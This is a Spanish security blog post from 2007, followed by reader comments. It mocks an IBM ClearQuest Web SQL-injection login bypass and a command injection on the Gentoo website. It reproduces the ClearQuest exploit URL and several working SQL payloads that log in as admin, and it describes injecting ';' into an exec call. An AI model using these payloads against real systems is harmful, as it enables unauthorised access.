sábado, agosto 18, 2007

Qué Gente!

Hoy es sábado y no me apetece ser muy malo ni tener mucha guerra, pero...un poco sí.

Revisando los últimos exploits me encuentro con este:

IBM Rational ClearQuest Web Login Bypass (SQL Injection)

SAMPLE URL:
===========

http://SERVERNAMEHERE/cqweb/main?command=GenerateMainFrame&ratl_userdb=DATABASENAMEHERE,&test=&clientServerAddress=http://SERVERNAMEHERE/cqweb/login&username='INJECTIONGOESHERE&password=PASSWORDHERE&schema=SCHEMEAHERE&userDb=DATABASENAMEHERE

Log in as "admin":
==================


' OR login_name LIKE '%admin%'--

(other variations work as well)
' OR login_name LIKE 'admin%'--
' OR LOWER(login_name) LIKE '%admin%'--
' OR LOWER(login_name) LIKE 'admin%'--
etc...use your imagination...


Tras la cagada de "Como comerse una comilla" siempre piensas, que esa es un buena cagada, pero que IBM se coma una comilla en el campo USERNAME de un formulario de login indica el número de pruebas que le han hecho a este producto de seguridad: EXACTEMANTE Cero mil cero cientas cero cero o dicho de otra forma, en binario 0000000.

La otra cagadita del día, ha sido la de Gentoo, que me ha encantado, en este caso el Bug#: 187971

Gentoo Website Command Injection Issue

El problema está en que no está bien filtrado y se hace una llamada a exec por lo que basta con poner un ";" y ejecutar cualquier otra instrucción en el sistema operativo. Una Injección de comandos remota.

Cuando esto se hace público rápidamente el progrmador busca una solución y se la postea a los colegas porque

"Sorry I am out of town and don't have access to Gentoo servers"

pero se lo curra y ofrece una solución:

for the resolution, the solution should be something more to the effect:

[!--#exec cmd="export QUERY_STRING;./similar.py" --]


No obstante, luego recapacita y se da cuenta de "ups!, yo creo que esto lo he hecho más veces!". Y vuelve a postear:

Oh, forgot to mention... they /similar page is not the only one where "exec
cmd" is used. So this will have to be fixed in all occurrences. They're all
found in mksite.py though.


Al final, se optó por tirar abajo los servidores hasta que regresaran de las conferecias, y luego lo explicaron.

¿Serían conferencias sobre seguridad? ¿Auditoría de código? ¿Testing? ¿Planes de respaldo? ¿Gestión de CPD? ¿downtime?

15 comentarios:

  1. No te apetece ser malo, pero es que te obligan... :-P

    ResponderEliminar
  2. Gran cagada de Gentoo... XD ese tío no se si encontrará mucho trabajo después de esto...

    Ah chema! Si Batman no se quita sus mallas en fin de semana no veo por qué deberías hacerlo tu.... ;)

    ResponderEliminar
  3. Hola Maligno. en el blog de Daniel Matey me he topado con esto:

    http://www.zone-h.org/content/view/14780/31/

    Mi abuelo diría que en todas partes cuecen habas.

    ResponderEliminar
  4. Por cierto, Chema, que estoy esperando 2 cosas:
    - que me contestes al mail que te envié hace un par de días, o al menos me digas si te ha llegado...
    - que hables de la pila de parches de Microsoft que salió el martes pasado, que creo que había bastantes cosillas interesantes, ¿no? }:-)))) Creo que algún ISP se quedó sin ancho de banda esos días debido a esas actualizaciones. También aparecieron advisories de eeye et al. Parece que eran importantes... ¿o no? xDDD

    :-*
    -r

    ResponderEliminar
  5. @penyaskito, ¿te das cuenta? No puedo descansar ni los fines de semana de agosto!

    @slayer, seguro que sí. En el lado del bien son muy buenos. Además, el pobre estaba de conferencias y total, que la gente de gentoo se quede sin paquetes... ¿quién quiere actualizar el sistema? Na,na. Ya los sacarían de algún otro sitio.

    @anónimo, ese es el post de Cómo Comerse una Comilla al que hago referencia en este post dónde yo recomendaba un castigo para el programador.

    @romansoft, de la primera cosas, tengo que contestarte, pero voy un poco atascado en los mails, empezaré a darle brillo el lunes y espero el miercoles haber contestado a todos, incluyendo al tuyo. A ver si podemos ayudarte a conseguir un Windows XP Professional para tí o por el contrario te enseño a optimizar el Windows Vista! ;) De todas formas, con el portátil ese, el Windows 98 SE no es tan mala opción XD.

    Respecto a lo de los parches, yo ya me he actualizado y mis servidores también, pero sí son 9 y había varias críticas. De eso no se salva nadie. Aquí en el lado del mal podríamos hablar sobre como el sistema de actulizaciones de Spectra actualiza mensualmente más de 500 millones de usuarios en todo el mundo, con un número de incidencias bajísimo.

    Supongo que no podrían parar los servidores de SU (Spectra Update) mientras el programador venga de las conferencias....

    ResponderEliminar
  6. Supongo que no podrían parar los servidores de SU (Spectra Update) mientras el programador venga de las conferencias...

    jodó, cuanta maldad en tan pocas letras XDDD

    con respecto a estos asuntillos que nos ocupan... ¿es normal que haya tanta actividad en agosto?

    ResponderEliminar
  7. La verdad es que es un agosto atípico. ¡Qué estrés!

    ResponderEliminar
  8. Vaya cagada del site-admin.

    "Supongo que no podrían parar los servidores de SU (Spectra Update) mientras el programador venga de las conferencias...."

    Buen dardo, lástima que apuntes mal... Esos servidores no se utilizan como repositorios de paquetes, es un simple website con información.

    ¿Otra vez pillado en offside? :D

    ResponderEliminar
  9. Hola Bastian!

    En primer lugar tuvieron que tirar:

    archives.gentoo.org
    packagestest.gentoo.org
    scripts.gentoo.org
    archivestest.gentoo.org
    kiss.gentoo.org
    packages.gentoo.org
    stats.gentoo.org
    survey.gentoo.org

    Que desde el día 7 aún hoy no están levantados.

    En segundo lugar los servidores de Spectra Update no solo son los repositorios de archivos. También están las apps de info.

    ¿offside? ¿otra vez?

    Saludos!

    ResponderEliminar
  10. @slayer, seguro que sí. En el lado del bien son muy buenos. Además, el pobre estaba de conferencias y total, que la gente de gentoo se quede sin paquetes... ¿quién quiere actualizar el sistema? Na,na. Ya los sacarían de algún otro sitio.

    En cuanto a las actualizaciones del sistema no ha habido el mas minimo problema, o yo por lo menos no lo he tenido.

    archives.gentoo.org no es desde donde te descargas las actualizaciones, simplemente es el listado de paquetes con su estado,cambios, etc.

    ResponderEliminar
  11. perdona que de el coñazo, al que me referia de consulta de paquetes online es packages.gentoo.org no archives.gentoo.org. El resto la verdad que no los he usado nunca (no se ni pa que valen, sera cosa de mirarlos cuando este otravez online).

    ResponderEliminar
  12. @opotonil, no das el coñazo, gracias por la info! ;)

    ResponderEliminar
  13. SI pero el caso es levantar mierda, rectificalo en el post, :) Gracias

    ResponderEliminar
  14. @anónimo,

    que rectifique que? jajaja. Está perfecto!! ¿Qué te parece a tí que está mal?. De hecho, voy a hacer mucho más cachondeo de esto!!

    ResponderEliminar
  15. Última hora, se confirma que los servidores de Gentoo no se han caido, siguen en el escritorio del tipo que está de conferencias!

    ResponderEliminar